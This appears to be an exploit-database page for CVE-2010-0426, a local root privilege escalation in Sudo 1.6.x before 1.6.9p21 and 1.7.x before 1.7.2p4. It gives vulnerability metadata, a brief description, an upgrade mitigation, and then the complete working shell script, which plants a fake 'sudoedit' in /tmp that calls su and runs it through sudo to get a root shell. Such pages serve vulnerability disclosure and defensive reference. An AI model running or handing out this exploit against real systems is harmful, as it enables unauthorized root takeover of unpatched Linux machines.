header-logo
Suggest Exploit
vendor:
Sudo
by:
Slouching and kingcope
7,2
CVSS
HIGH
Local root exploit
264
CWE
Product Name: Sudo
Affected Version From: 1.6.x before 1.6.9p21
Affected Version To: 1.7.x before 1.7.2p4
Patch Exists: YES
Related CWE: CVE-2010-0426
CPE: a:todd_miller:sudo
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-1163/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0361/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-1a9f678d-48ca-11df-85f8-000c29a67389/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-1163/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-1163/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-928-1/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0476/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0172/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-0426/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-018a84d0-2548-11df-b4a3-00e0815b8da8/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-0426/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0122/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0009-1-service-console-package-sudo-cve-2010-0426/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-0426/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

Tod Miller Sudo local root exploit

This exploit allows a local user to gain root privileges by exploiting a vulnerability in Sudo versions 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4. The exploit creates a malicious script in the /tmp directory and uses the sudo command to execute it with root privileges. The malicious script contains commands to spawn a root shell.

Mitigation:

Upgrade to Sudo version 1.6.9p21 or 1.7.2p4 or later.
Source

Exploit-DB raw data:

#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1

Navigation

Suggest Exploit

Services By CQR